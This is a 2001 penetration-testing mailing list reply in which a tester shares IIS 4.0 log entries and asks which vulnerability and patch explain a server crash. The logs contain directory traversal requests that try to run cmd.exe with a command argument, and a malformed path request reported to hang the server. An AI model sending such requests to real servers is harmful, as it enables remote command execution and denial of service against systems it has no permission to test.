Penetration Testing mailing list archives
Re: [PEN-TEST] iis 4.0 pen-test
From: Sean <yupdef56 () YAHOO COM>
Date: Fri, 23 Feb 2001 12:07:52 -0800
here is the section of the log starting with the first two requests that i sent, 45 Normal get requests and about 6 more .. tests. I was testing for unicode vulnerabilities from a browser. Have not reproduced it yet b/c it is a production system. Also, you may have seen the suggestions on PEN-TEST, but the hotfix mentioned is pre-sp6a and will not install. 2001-02-21 08:27:18 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe /c+net+send+computer+hello 404 123 623 360 10 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC - 2001-02-21 08:27:42 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../protect/cmd.exe /c+net+send+computer+hello 404 123 623 357 0 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC - <45 "NORMAL GET REQUESTS"> 2001-02-21 08:27:56 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /exchange/USA//../protect/cmd.exe /c+net+send+computer+hello 403 5 757 366 0 80 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=GCMNGAABONLEBIJMOKDEBGPC - 2001-02-21 08:32:20 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123 623 319 10 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP - 2001-02-21 08:32:31 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123 623 322 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP - 2001-02-21 08:32:38 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET //../texy.txt - 404 123 623 322 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP - 2001-02-21 08:32:42 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /../../texy.txt - 404 123 623 321 0 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP - 2001-02-21 08:33:06 from.adress.xxx.yyy - W3SVC1 WEBSTER web.adress.xxx.yyy GET /...*/text.txt - 404 123 623 316 10 443 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+4.01;+Windows+NT) ASPSESSIONIDQQGQQQZT=HCMNGAABNGMBHFNGPAGHJELP - --- Marc Maiffret <marc () eeye com> wrote:
So when you connected to the web server port what command did you actually send? When it crash were you still able to connect to port 80 or not? Before you sent this request did you send a lot of other GET requests with invalid characters in file names? For example !@#$%^&*() etc...? Signed, Marc Maiffret Chief Hacking Officer eCompany / eEye T.949.349.9062 F.949.349.9538 http://eEye.com | -----Original Message----- | From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf | Of Sean | Sent: Thursday, February 22, 2001 4:43 PM | To: PEN-TEST () SECURITYFOCUS COM | Subject: iis 4.0 pen-test | | | i'm pen-testing an iis 4.0 box; the following get req. | crashed the server (stopped responding to http reqs | and rpc comms stopped to - could still ping it and | processor and mem were normal). | | GET /...*/text.txt - 404 123 623 316 10 443 HTTP/1.1 | Mozilla/4.0+blahblahblah | | any idea what patch fixes this one or what vuln it is | ? | | thanks | | sean | | | __________________________________________________ | Do You Yahoo!? | Yahoo! Auctions - Buy the things you want at great prices! http://auctions.yahoo.com/
__________________________________________________ Do You Yahoo!? Yahoo! Auctions - Buy the things you want at great prices! http://auctions.yahoo.com/
Current thread:
- [PEN-TEST] iis 4.0 pen-test Sean (Feb 22)
- Re: [PEN-TEST] iis 4.0 pen-test van der Kooij, Hugo (Feb 22)
- Re: [PEN-TEST] iis 4.0 pen-test Thomas Reinke (Feb 22)
- <Possible follow-ups>
- Re: [PEN-TEST] iis 4.0 pen-test Sean (Feb 24)
- Re: [PEN-TEST] iis 4.0 pen-test van der Kooij, Hugo (Feb 22)